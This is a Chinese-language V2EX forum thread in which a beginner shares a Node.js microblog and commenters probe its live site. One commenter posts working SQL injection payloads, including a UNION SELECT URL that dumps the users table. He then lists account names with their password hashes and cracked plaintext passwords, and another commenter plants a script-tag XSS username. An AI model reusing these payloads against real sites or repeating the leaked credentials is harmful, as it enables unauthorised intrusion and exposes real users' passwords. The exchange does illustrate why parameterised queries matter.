初学 nodejs,撸了个简单的微博系统,求轻喷

2016-05-24 19:09:57 +08:00
 lizhiqing1996

截图:

示例: microblog

源码: github

6710 次点击
所在节点    Node.js
30 条回复
ruooooooli
2016-05-24 19:15:42 +08:00
看起来挺好的 也打算学学
willhunger
2016-05-24 19:25:58 +08:00
你的 node.js 怎么学习的呀??
a2ex
2016-05-24 19:31:27 +08:00
http 服务器消息处理+数据库读写。。。
lizhiqing1996
2016-05-24 19:32:39 +08:00
@willhunger 我看的《 nodejs 开发指南》,这个微博例子就是上面的,不过我换了很多内容
lizhiqing1996
2016-05-24 19:33:48 +08:00
@a2ex 初学只能做到这样了。。。
Dvel
2016-05-24 19:47:45 +08:00
学了多久了,我过阵子也打算学学 node.js
zonghua
2016-05-24 19:50:17 +08:00
没什么好学的。。。
lizhiqing1996
2016-05-24 20:20:38 +08:00
@Dvel 差不多一周,大学狗没什么时间,一周七天都有课,作业还超多


@zonghua 主要是在学 Android ,学 nodejs 主要是学习写 API
freewheel
2016-05-25 01:20:12 +08:00
maek
xqin
2016-05-25 09:05:39 +08:00
赤果果的 sql 注入...
https://github.com/Zhiqing-Lee/microblog/blob/master/models/post.js 第 32 行,自己手工将当前的用户名拼入 Sql 语句中.
整个项目中,其他地方都是用的 ? 来带入的(这时候会自动处理, 不会有注入的情况, 只有这里自己手工带进去了).

然后我注册了一个名为 `" or ""="` 的用户, 然后...你懂的, 自己看结果
我注册的账号的列表页:
http://mb.zhiqing.info/u/%22%20or%20%22%22=%22

其他普通帐号的:
http://mb.zhiqing.info/u/qwe
qinxi
2016-05-25 09:46:13 +08:00
@xqin 哈哈哈,一看初学者,我就猜有人要注入
xqin
2016-05-25 09:56:34 +08:00
再来个炸弹:

http://mb.zhiqing.info/u/%22%20union%20ALL%20select%20name%20as%20user,password%20as%20post,%200%20as%20time%20from%20users%20where%20%22%22=%22

根据查出来的结果, 以及根据代码中密码的写入方式得知是 MD5 + base64 的结果,所以...

以下为目前列出来的账号的密码:

zhiqing f57b888bc53ccfa3e4a71f19604df23c 找到了,但是是一条付费才能看的.
qwe 76d80224611fc919a5d54f0ff9fba446 qwe
123 202cb962ac59075b964b07152d234b70 123
<h1>123</h1> 5e6535e26cf8c546395f4e3f4c5d189e 未找到
123qwe 46f94c8de14fb36680850768ff1b7f2a 123qwe
3123 e10adc3949ba59abbe56e057f20f883e 123456
<img src=x> eb6cd2e33d39e677b19b611fe2eb32ee 未找到
jerry 202cb962ac59075b964b07152d234b70 123
foo 37b51d194a7513e45b56f6524f2d51f2 bar
" or ""=" e10adc3949ba59abbe56e057f20f883e 123456
tet111 4297f44b13955235245b2497399d7a93 123123
xqin
2016-05-25 09:57:08 +08:00
@qinxi 这不是猜, 这是根据他的代码得出来的结论以及事实.
cappuccinos
2016-05-25 10:03:55 +08:00
好样的 1!
xqin
2016-05-25 10:09:06 +08:00
zhiqing 的那个密码也查出来了 密码为: lizhiqing
garipan
2016-05-25 10:11:18 +08:00
你们太坏了 真的
lizhiqing1996
2016-05-25 11:02:45 +08:00
@xqin 学习了,终于意识到自己的代码是多么不安全了😂
hard2reg
2016-05-25 11:07:01 +08:00
你们这群人,太可怕了
hard2reg
2016-05-25 11:07:43 +08:00
@xqin 大神,收我为徒吧!
jame
2016-05-25 12:33:22 +08:00
帐号可以带空格, 带标签
注册了一个<script>alert(1);</script>

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/280990

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX